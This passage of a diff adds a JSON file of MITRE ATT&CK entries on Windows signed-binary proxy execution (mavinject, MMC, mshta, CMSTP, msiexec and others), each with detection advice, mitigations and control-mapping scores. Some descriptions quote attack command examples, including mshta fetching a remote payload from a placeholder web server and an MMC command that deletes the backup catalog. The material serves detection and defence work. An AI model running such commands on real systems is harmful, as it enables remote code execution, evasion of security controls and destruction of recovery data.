+                "description": "Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)\n\nAdversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. C:\\Windows\\system32\\mavinject.exe PID /INJECTRUNNING PATH_DLL).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe is digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process. \n\nIn addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its  /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed)",
+                "detection": "Monitor the execution and arguments of mavinject.exe. Compare recent invocations of mavinject.exe with prior history of known good arguments and injected DLLs to determine anomalous and potentially adversarial activity.\n\nAdversaries may rename abusable binaries to evade detections, but the argument INJECTRUNNING is required for mavinject.exe to perform [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001) and may therefore be monitored to alert malicious activity.",
+                "mitigations": [
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    }
+                ]
+            },
+            {
+                "tid": "T1218.014",
+                "name": "Signed Binary Proxy Execution: MMC",
+                "url": "https://attack.mitre.org/techniques/T1218/014",
+                "description": "Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console, or MMC, is a signed Windows binary and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)\n\nFor example, mmc C:\\Users\\foo\\admintools.msc /a will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is mmc gpedit.msc, which will open the Group Policy Editor application window. \n\nAdversaries may use MMC commands to perform malicious tasks. For example, mmc wbadmin.msc delete catalog -quiet deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: wbadmin.msc may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal)\n\nAdversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc.(Citation: abusing_com_reg)",
+                "detection": "Monitor processes and command-line parameters for suspicious or malicious use of MMC. Since MMC is a signed Windows binary, verify use of MMC is legitimate and not malicious. \n\nMonitor for creation and use of .msc files. MMC may legitimately be used to call Microsoft-created .msc files, such as services.msc or eventvwr.msc. Invoking non-Microsoft .msc files may be an indicator of malicious activity. ",
+                "mitigations": [
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            },
+            {
+                "mid": "M1050",
+                "name": "Exploit Protection",
+                "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.",
+                "url": "https://attack.mitre.org/mitigations/M1050"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 1.880952380952381,
+        "adjusted_score": 1.880952380952381,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "2.7",
+            "4.1",
+            "4.7",
+            "4.8",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "10.5",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-11",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "IA-2",
+            "RA-5",
+            "SI-10",
+            "SI-16",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.780952380952381,
+            "mitigation_score": 0.5818181818181818,
+            "detection_score": 1
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 1
+    },
+    {
+        "tid": "T1218.001",
+        "name": "Signed Binary Proxy Execution: Compiled HTML File",
+        "description": "Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)\n\nA custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)",
+        "url": "https://attack.mitre.org/techniques/T1218/001",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Monitor and analyze the execution and arguments of hh.exe. (Citation: MsitPros CHM Aug 2017) Compare recent invocations of hh.exe with prior history of known good arguments to determine anomalous and potentially adversarial activity (ex: obfuscated and/or malicious commands). Non-standard process execution trees may also indicate suspicious or malicious behavior, such as if hh.exe is the parent process for suspicious processes and activity relating to other adversarial techniques.\n\nMonitor presence and use of CHM files, especially if they are not typically used within an environment.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1218",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            },
+            {
+                "mid": "M1021",
+                "name": "Restrict Web-Based Content",
+                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1021"
+            }
+        ],
+        "cumulative_score": 0.3142857142857143,
+        "adjusted_score": 0.3142857142857143,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "2.7",
+            "9.3",
+            "9.6"
+        ],
+        "nist_controls": [
+            "CM-11",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-18",
+            "SI-10",
+            "SI-16",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1218.002",
+        "name": "Signed Binary Proxy Execution: Control Panel",
+        "description": "Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.\n\nControl Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)\n\nMalicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.\n\nAdversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed. CPL files not exporting CPlApplet are not directly executable.(Citation: ESET InvisiMole June 2020)",
+        "url": "https://attack.mitre.org/techniques/T1218/002",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe.(Citation: TrendMicro CPL Malware Jan 2014)\n\nInventory Control Panel items to locate unregistered and potentially malicious files present on systems:\n\n* Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace and HKEY_CLASSES_ROOT\\CLSID\\{GUID}. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL)\n* CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the CPLs and Extended Properties Registry keys of HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically ( WinExec(\"c:\\windows\\system32\\control.exe {Canonical_Name}\", SW_NORMAL);) or from a command line (control.exe /name {Canonical_Name}).(Citation: Microsoft Implementing CPL)\n* Some Control Panel items are extensible via Shell extensions registered in HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Controls Folder\\{name}\\Shellex\\PropertySheetHandlers where {name} is the predefined name of the system item.(Citation: Microsoft Implementing CPL)\n\nAnalyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques.(Citation: TrendMicro CPL Malware Jan 2014)",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "Module: Module Load",
+            "Process: OS API Execution",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1218",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            }
+        ],
+        "cumulative_score": 0.2761904761904762,
+        "adjusted_score": 0.2761904761904762,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.5",
+            "2.7",
+            "4.1",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "CA-7",
+            "CM-11",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SI-10",
+            "SI-16",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1218.003",
+        "name": "Signed Binary Proxy Execution: CMSTP",
+        "description": "Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.\n\nAdversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017)  and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.\n\nCMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)",
+        "url": "https://attack.mitre.org/techniques/T1218/003",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.\n\nSysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)\n\n* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.\n* To detect [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Network Traffic: Network Connection Creation",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1218",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            }
+        ],
+        "cumulative_score": 0.32380952380952377,
+        "adjusted_score": 0.32380952380952377,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "2.7",
+            "4.1",
+            "4.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "CM-11",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "RA-5",
+            "SI-10",
+            "SI-16",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1218.004",
+        "name": "Signed Binary Proxy Execution: InstallUtil",
+        "description": "Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\\Windows\\Microsoft.NET\\Framework\\v\\InstallUtil.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v\\InstallUtil.exe.\n\nInstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)",
+        "url": "https://attack.mitre.org/techniques/T1218/004",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1218",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            }
+        ],
+        "cumulative_score": 0.319047619047619,
+        "adjusted_score": 0.319047619047619,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "2.7",
+            "4.1",
+            "4.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "CM-11",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "RA-5",
+            "SI-10",
+            "SI-16",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1218.005",
+        "name": "Signed Binary Proxy Execution: Mshta",
+        "description": "Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) \n\nMshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)\n\nFiles may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))\n\nThey may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta\n\nMshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)",
+        "url": "https://attack.mitre.org/techniques/T1218/005",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.\n\nMonitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "Network Traffic: Network Connection Creation",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1218",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            }
+        ],
+        "cumulative_score": 0.3857142857142857,
+        "adjusted_score": 0.3857142857142857,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "2.7",
+            "4.1",
+            "4.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "CM-11",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "RA-5",
+            "SI-10",
+            "SI-16",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1218.007",
+        "name": "Signed Binary Proxy Execution: Msiexec",
+        "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft.\n\nAdversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)",
+        "url": "https://attack.mitre.org/techniques/T1218/007",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Use process monitoring to monitor the execution and arguments of msiexec.exe. Compare recent invocations of msiexec.exe with prior history of known good arguments and executed MSI files or DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of msiexec.exe may also be useful in determining the origin and purpose of the MSI files or DLLs being executed.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Module: Module Load",
+            "Network Traffic: Network Connection Creation",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1218",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 0.3476190476190476,
+        "adjusted_score": 0.3476190476190476,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.7",
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "IA-2"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1218.008",
+        "name": "Signed Binary Proxy Execution: Odbcconf",
+        "description": "Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft.\n\nAdversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\file.dll\"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) \n",
+        "url": "https://attack.mitre.org/techniques/T1218/008",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of odbcconf.exe may also be useful in determining the origin and purpose of the DLL being loaded.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Module: Module Load",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1218",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            }
+        ],
+        "cumulative_score": 0.29523809523809524,
+        "adjusted_score": 0.29523809523809524,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "2.7",
+            "4.1",
+            "4.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "CM-11",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "RA-5",
+            "SI-10",
+            "SI-16",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1218.009",
+        "name": "Signed Binary Proxy Execution: Regsvcs/Regasm",
+        "description": "Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)\n\nBoth utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)",
+        "url": "https://attack.mitre.org/techniques/T1218/009",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1218",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            }
+        ],
+        "cumulative_score": 0.30952380952380953,
+        "adjusted_score": 0.30952380952380953,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
